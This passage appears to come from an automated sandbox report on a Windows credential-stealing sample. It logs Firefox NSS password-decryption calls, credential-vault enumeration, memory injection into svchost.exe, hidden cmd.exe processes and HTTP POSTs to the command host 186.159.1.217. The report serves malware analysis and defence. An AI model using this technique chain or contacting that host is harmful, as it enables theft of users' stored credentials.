| Get Address | - | function = FindFirstFileExA, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = FindNextFileA, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = IsValidCodePage, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetOEMCP, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetCommandLineA, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetCommandLineW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetEnvironmentStringsW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = FreeEnvironmentStringsW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetProcessHeap, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = FlushFileBuffers, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = WriteFile, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetConsoleCP, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = GetConsoleMode, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = ReadFile, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = SetFilePointerEx, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = SetStdHandle, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = HeapSize, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = WriteConsoleW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = ReadConsoleW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | - | function = CreateFileW, ordinal = 0, address_out = 0x22fbb4 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = NSS_Init, address_out = 0x7235d70b |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = NSS_Shutdown, address_out = 0x7235d13c |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_GetInternalKeySlot, address_out = 0x722f3c51 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_NeedLogin, address_out = 0x7230542b |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_GetTokenName, address_out = 0x722f39df |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_Authenticate, address_out = 0x722dd3ca |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_CheckUserPassword, address_out = 0x722dcbc4 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11SDR_Decrypt, address_out = 0x722f00a7 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_FreeSlot, address_out = 0x722f3333 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (47)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 30000 milliseconds (30.000 seconds) |
|
3 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| Sleep | duration = 3 milliseconds (0.003 seconds) |
|
1 | |
| Sleep | duration = 6 milliseconds (0.006 seconds) |
|
1 | |
| Sleep | duration = 9 milliseconds (0.009 seconds) |
|
1 | |
| Sleep | duration = 12 milliseconds (0.012 seconds) |
|
1 | |
| Sleep | duration = 15 milliseconds (0.015 seconds) |
|
1 | |
| Sleep | duration = 18 milliseconds (0.018 seconds) |
|
1 | |
| Sleep | duration = 21 milliseconds (0.021 seconds) |
|
1 | |
| Sleep | duration = 24 milliseconds (0.024 seconds) |
|
1 | |
| Sleep | duration = 27 milliseconds (0.027 seconds) |
|
1 | |
| Sleep | duration = 30 milliseconds (0.030 seconds) |
|
1 | |
| Sleep | duration = 33 milliseconds (0.033 seconds) |
|
1 | |
| Sleep | duration = 36 milliseconds (0.036 seconds) |
|
1 | |
| Sleep | duration = 39 milliseconds (0.039 seconds) |
|
1 | |
| Sleep | duration = 42 milliseconds (0.042 seconds) |
|
1 | |
| Sleep | duration = 45 milliseconds (0.045 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:26 (UTC) |
|
2 | |
| Get Time | type = Performance Ctr, time = 27207845544 |
|
1 | |
| Get Time | type = Performance Ctr, time = 27275320203 |
|
1 | |
| Get Time | type = Ticks, time = 11064230 |
|
1 | |
| Get Time | type = Ticks, time = 11064246 |
|
1 | |
| Get Time | type = Ticks, time = 11064261 |
|
1 | |
| Get Time | type = Ticks, time = 11064277 |
|
1 | |
| Get Time | type = Ticks, time = 11064292 |
|
1 | |
| Get Time | type = Ticks, time = 11064308 |
|
1 | |
| Get Time | type = Ticks, time = 11064324 |
|
1 | |
| Get Time | type = Ticks, time = 11064370 |
|
1 | |
| Get Time | type = Ticks, time = 11064402 |
|
1 | |
| Get Time | type = Ticks, time = 11064433 |
|
1 | |
| Get Time | type = Ticks, time = 11064464 |
|
1 | |
| Get Time | type = Ticks, time = 11064495 |
|
1 | |
| Get Time | type = Ticks, time = 11064542 |
|
1 | |
| Get Time | type = Ticks, time = 11064589 |
|
1 | |
| Get Time | type = Ticks, time = 11064636 |
|
1 | |
| Get Time | type = Ticks, time = 11064682 |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Hardware Information |
|
1 | |
| Open credential vault | - |
|
2 | |
| Enumerate credential vault items | - |
|
2 |
Environment (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
2 |
Network Behavior
DNS (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = 186.159.1.217, address_out = 186.159.1.217 |
|
2 |
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 0 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 186.159.1.217 |
TCP Session #1
| Information | Value |
|---|---|
| Remote Address | 186.159.1.217 |
| Remote Port | 80 |
| Local Address | 192.168.0.251 |
| Local Port | - |
| Data Sent | 0 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3) |
|
1 | |
| Open Connection | protocol = http, server_name = 186.159.1.217, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP/1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/83/ |
|
1 | |
| Send HTTP Request | headers = Accept: */*, User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3), Host: 186.159.1.217, Connection: close, Content-Type: multipart/form-data; boundary=---------ODANMVDCLOFFUEBV, Content-Length: 286, url = 186.159.1.217/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/83/ |
|
1 |
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 0 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 186.159.1.217 |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | 186.159.1.217 |
| Server Port | 80 |
| Username | - |
| Password | - |
| Data Sent | 0 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3) |
|
1 | |
| Open Connection | protocol = http, server_name = 186.159.1.217, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP/1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/83/ |
|
1 | |
| Send HTTP Request | headers = Accept: */*, User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3), Host: 186.159.1.217, Connection: close, Content-Type: multipart/form-data; boundary=---------ODANMVDCLOFFUEBV, Content-Length: 286, url = 186.159.1.217/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/83/ |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| Server Name | 186.159.1.217 |
| Server Port | 80 |
| Username | - |
| Password | - |
| Data Sent | 0 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3) |
|
1 | |
| Open Connection | protocol = http, server_name = 186.159.1.217, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP/1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/81/ |
|
1 | |
| Send HTTP Request | headers = Accept: */*, User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3), Host: 186.159.1.217, Connection: close, Content-Type: multipart/form-data; boundary=---------XOJSXTJFMZPLETZX, Content-Length: 230, url = 186.159.1.217/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/81/ |
|
1 |
Process #40: svchost.exe
359
2
| Information | Value |
|---|---|
| ID | #40 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | svchost.exe |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:03:34, Reason: Child Process |
| Unmonitor | End Time: 00:04:16, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:42 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa70 |
| Parent PID | 0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A6C
0x
A68
0x
31C
0x
660
0x
B90
0x
C00
0x
5D0
0x
F4C
0x
F48
|
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x50000, size = 367 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x60000, size = 112 |
|
64 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x602104, size = 12 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10000000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10001000, size = 9216 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004000, size = 7168 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10006000, size = 1036 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10006000, size = 512 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10007000, size = 1024 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 22 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x70000, size = 12 |
|
7 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 16 |
|
8 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040ec, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 26 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004000, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 24 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 17 |
|
6 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x70000, size = 16 |
|
50 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040d0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040d4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040d8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 14 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040dc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 20 |
|
6 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040e0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040e4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 12 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004008, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000400c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 13 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004010, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004014, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 9 |
|
6 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004018, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000401c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004020, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004024, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 15 |
|
6 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004028, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 19 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000402c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004030, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 11 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004034, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004038, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000403c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004040, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004044, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004048, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 10 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000404c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004050, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004054, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004058, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000405c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004060, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004064, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 21 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004068, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000406c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004070, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004074, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004078, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000407c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004080, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 25 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004084, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004088, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000408c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004090, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 6 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004094, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004098, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040c4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040c8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040f4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 18 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040f8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040fc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004100, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004104, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040a0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040a4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040a8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x70000, size = 8 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x250000, size = 747 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x260000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x480000, size = 128 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x4a0000, size = 44 |
|
1 |
Host Behavior
COM (4)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WBEMLocator | IWbemLocator | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 50B6327F-AFD1-11D2-9CB9-0000F87A369E | 5BB11929-AFD1-11D2-9CB9-0000F87A369E | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer |
|
1 | |
| Execute | WBEMLocator | IWbemServices | method_name = ExecQuery, query_language = WQL |
|
1 |
File (16)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Pipe | Anonymous read pipe | size = 0 |
|
2 | |
| Create Pipe | Anonymous read pipe | size = 0 |
|
2 | |
| Create Pipe | Anonymous read pipe | size = 0 |
|
2 | |
| Create Pipe | Anonymous read pipe | size = 0 |
|
2 | |
| Create Pipe | Anonymous read pipe | size = 0 |
|
2 | |
| Create Pipe | Anonymous read pipe | size = 0 |
|
2 | |
| Read | - | size = 1024, size_out = 1024 |
|
1 | |
| Read | - | size = 607, size_out = 607 |
|
1 | |
| Read | - | size = 580, size_out = 580 |
|
1 | |
| Read | - | size = 72, size_out = 72 |
|
1 |
Process (58)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x3ec, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xa50, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xbb4, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xd70, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xed0, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xf1c, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| Enumerate Processes | - | - |
|
51 | |
| Enumerate Processes | - | - |
|
1 |
Module (71)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | WS2_32.dll | base_address = 0x75a90000 |
|
1 | |
| Load | ACTIVEDS.dll | base_address = 0x6eb70000 |
|
1 | |
| Load | WININET.dll | base_address = 0x77230000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76b10000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c00000 |
|
1 | |
| Load | ole32.dll | base_address = 0x76cd0000 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x76a60000 |
|
1 | |
| Get Handle | c:\windows\system32\msvcrt.dll | base_address = 0x76f80000 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = 115, address_out = 0x75a93ab2 |
|
1 | |
| Get Address | c:\windows\system32\activeds.dll | function = 9, address_out = 0x6eb716e6 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetConnectW, address_out = 0x7725492c |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetReadFile, address_out = 0x7724b406 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpSendRequestW, address_out = 0x7725ba12 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetOpenW, address_out = 0x77259197 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = InternetCloseHandle, address_out = 0x7724ab49 |
|
1 | |
| Get Address | c:\windows\system32\wininet.dll | function = HttpOpenRequestW, address_out = 0x77254a42 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x76b5ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Process32FirstW, address_out = 0x76b4fa35 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThread, address_out = 0x76b6375d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77389ac5 |
|
1 | |
